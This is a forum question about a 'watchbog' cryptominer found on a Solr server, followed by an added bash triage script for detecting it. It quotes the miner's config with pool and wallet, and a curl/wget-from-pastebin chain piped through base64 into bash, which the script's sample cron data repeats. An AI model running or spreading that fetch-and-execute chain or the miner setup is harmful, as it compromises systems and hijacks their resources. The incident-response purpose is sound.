I found the question below, but I need some more clarification, which is why I am writing again:
I have a process called “watchbog” that is completely hogging my CPU and I don't know what it is
So I did some digging and found that an executable is being run from the /tmp directory. The folder structure is something like this:
/tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data
In that folder there are two files: one executable, watchbog, which is actually being run, and one config.json. This is the content of the config file:
{
  "algo": "cryptonight",
  "api": {
    "port": 0,
    "access-token": null,
    "id": null,
    "worker-id": null,
    "ipv6": false,
    "restricted": true
  },
  "asm": true,
  "autosave": true,
  "av": 0,
  "background": true,
  "colors": true,
  "cpu-affinity": null,
  "cpu-priority": 3,
  "donate-level": 1,
  "huge-pages": false,
  "hw-aes": null,
  "log-file": null,
  "max-cpu-usage": 100,
  "pools": [
    {
      "url": "pool.minexmr.com:443",
      "user": "4AbjKdQkedGZXvzm6VxMJb1zLB2CAmCmXdoCisRsQFAUPs4TWFePDUcZzk5ui4EdZXT3uaXXtssqPCoKQPTz7PeZNkKASkm.old",
      "pass": "x",
      "rig-id": null,
      "nicehash": false,
      "keepalive": true,
      "variant": -1,
      "tls": false,
      "tls-fingerprint": null
    }
  ],
  "print-time": 60,
  "retries": 5,
  "retry-pause": 5,
  "safe": false,
  "threads": [
    {
      "low_power_mode": 1,
      "affine_to_cpu": false,
      "asm": true
    },
    {
      "low_power_mode": 1,
      "affine_to_cpu": false,
      "asm": true
    }
  ],
  "user-agent": null,
  "syslog": false,
  "watch": false
}
But deleting the folders is not helping; they are being recreated within a few seconds. So I tried to see what other processes are running and I found these:
solr 32616 0.0 0.0 4504 780 ? Ss 13:10 0:00 /bin/sh -c (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- h
solr 32618 0.0 0.0 11224 2924 ? S 13:10 0:00 bash
solr 32623 0.2 0.0 11644 3376 ? S 13:10 0:00 /bin/bash
solr 32656 200 0.1 270204 6996 ? Ssl 13:10 0:26 ./watchbog
The pastebin URL points to another shell command with another pastebin URL:
(curl -fsSL https://pastebin.com/raw/nMrfmnRa||wget -q -O- https://pastebin.com/raw/nMrfmnRa) | base64 -d | /bin/bash
This second pastebin URL points to a base64-encoded shell script. I can't include it here due to the character limit. Here is the link: https://pastebin.com/raw/nMrfmnRa
I am no expert in this field, but it looks like the script is setting up a cron job which downloads the executable again.
This is all I could find on my own. Can anyone please guide me as to how I can stop this whole thing, or would I have to redeploy the server again?
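The post shows three things a responder would hunt for on a box like this: a download-and-execute chain ("(curl ...||wget ...) | base64 -d | /bin/bash") that re-creates the miner, a binary executing out of a /tmp/systemd-private-* directory, and an XMRig-style config.json with a pool URL. The script below is an added triage example (not code from the question, the pastebin stages, or any project) that turns each of those into a reusable check and exercises them on constructed sample input: the ps lines quoted in the post, plus a cron entry reconstructed from the second-stage command and a trimmed copy of the posted config, both of which are assumptions since the actual crontab was not shown. Running it as `bash triage.sh scan` on the affected host applies the same checks to every user's crontab, the system cron files, `ps`, and `/proc/*/exe`.

```bash
#!/usr/bin/env bash
# Triage helpers for a watchbog-style cryptominer infection.
# Added example; not code from the original question or from any project.
# Indicators are taken from the post: a miner binary under /tmp/systemd-private-*,
# an XMRig-style config.json pointing at pool.minexmr.com, and a
# "(curl ...||wget ...) | base64 -d | /bin/bash" chain pulling stages from pastebin.

# 1. Persistence: lines (crontab entries, ps command lines) in which curl or wget
#    fetches a URL and the result is piped onward. Reads stdin, prints matches.
find_download_pipelines() {
    grep -E '(curl|wget)[^|]*https?://[^|[:space:]]+.*\|'
}

# 2. Execution from world-writable locations. Expects "PID PATH" lines such as
#    those produced by list_process_exes below; prints the suspicious ones.
find_tmp_executables() {
    awk '$2 ~ "^(/tmp|/var/tmp|/dev/shm)/" { print }'
}

# 3. Miner config: exit 0 if the JSON file names a mining algorithm and a pool
#    list whose URL carries a host:port, as the posted config.json does.
is_miner_config() {
    local f=$1
    grep -Eq '"algo"[[:space:]]*:[[:space:]]*"' "$f" &&
    grep -Eq '"pools"[[:space:]]*:' "$f" &&
    grep -Eq '"url"[[:space:]]*:[[:space:]]*"[^"]+:[0-9]+"' "$f"
}

# Live collectors (Linux only). Invoked by: bash triage.sh scan
list_process_exes() {
    local p
    for p in /proc/[0-9]*; do
        # a deleted binary still shows its original path, suffixed "(deleted)"
        printf '%s %s\n' "${p#/proc/}" "$(readlink "$p/exe" 2>/dev/null)"
    done
}

list_all_crontabs() {
    local u
    while IFS=: read -r u _; do
        crontab -l -u "$u" 2>/dev/null | sed "s/^/[$u] /"
    done < /etc/passwd
    cat /etc/crontab /etc/cron.d/* 2>/dev/null
}

live_scan() {
    echo "== download-and-execute pipelines in cron =="
    list_all_crontabs | find_download_pipelines
    echo "== download-and-execute pipelines in running processes =="
    ps axo user,pid,args | find_download_pipelines
    echo "== processes executing from /tmp, /var/tmp, /dev/shm =="
    list_process_exes | find_tmp_executables
}

# Constructed sample input for an offline run. sample_ps reuses the ps lines
# quoted in the post plus one benign line; sample_cron is an ASSUMED crontab
# entry built from the second-stage command (the real crontab was not shown).
sample_ps() {
    cat <<'EOF'
solr 32616 0.0 0.0 4504 780 ? Ss 13:10 0:00 /bin/sh -c (curl -fsSL https://pastebin.com/raw/aGTSGJJp||wget -q -O- h
solr 32618 0.0 0.0 11224 2924 ? S 13:10 0:00 bash
solr 32656 200 0.1 270204 6996 ? Ssl 13:10 0:26 ./watchbog
root 1 0.0 0.1 4504 780 ? Ss 13:00 0:00 /sbin/init
EOF
}
sample_cron() {
    cat <<'EOF'
*/10 * * * * (curl -fsSL https://pastebin.com/raw/nMrfmnRa||wget -q -O- https://pastebin.com/raw/nMrfmnRa) | base64 -d | /bin/bash
0 3 * * * /usr/bin/certbot renew --quiet
EOF
}
sample_exes() {
    cat <<'EOF'
1 /usr/lib/systemd/systemd
32656 /tmp/systemd-private-afjdhdicjijo473skiosoohxiskl573q-systemd-timesyncc.service-g1g5qf/cred/fghhhh/data/watchbog
32618 /usr/bin/bash
EOF
}
# Writes a trimmed copy of the posted config.json to a temp file, prints its path.
write_sample_config() {
    local f
    f=$(mktemp)
    cat > "$f" <<'EOF'
{
  "algo": "cryptonight",
  "background": true,
  "pools": [
    { "url": "pool.minexmr.com:443", "pass": "x", "keepalive": true }
  ]
}
EOF
    printf '%s\n' "$f"
}

case "${1-}" in
    scan) live_scan ;;
    demo)
        sample_ps   | find_download_pipelines
        sample_cron | find_download_pipelines
        sample_exes | find_tmp_executables
        cfg=$(write_sample_config); is_miner_config "$cfg" && echo "miner config: $cfg"; rm -f "$cfg"
        ;;
esac
```

On the real host the interesting output is the owner of the cron entry and the parent of the curl/wget shell: both run as `solr` in the post, which points at the Solr service as the way in, and removing the crontab entry and killing the process tree only holds if that entry point is closed as well.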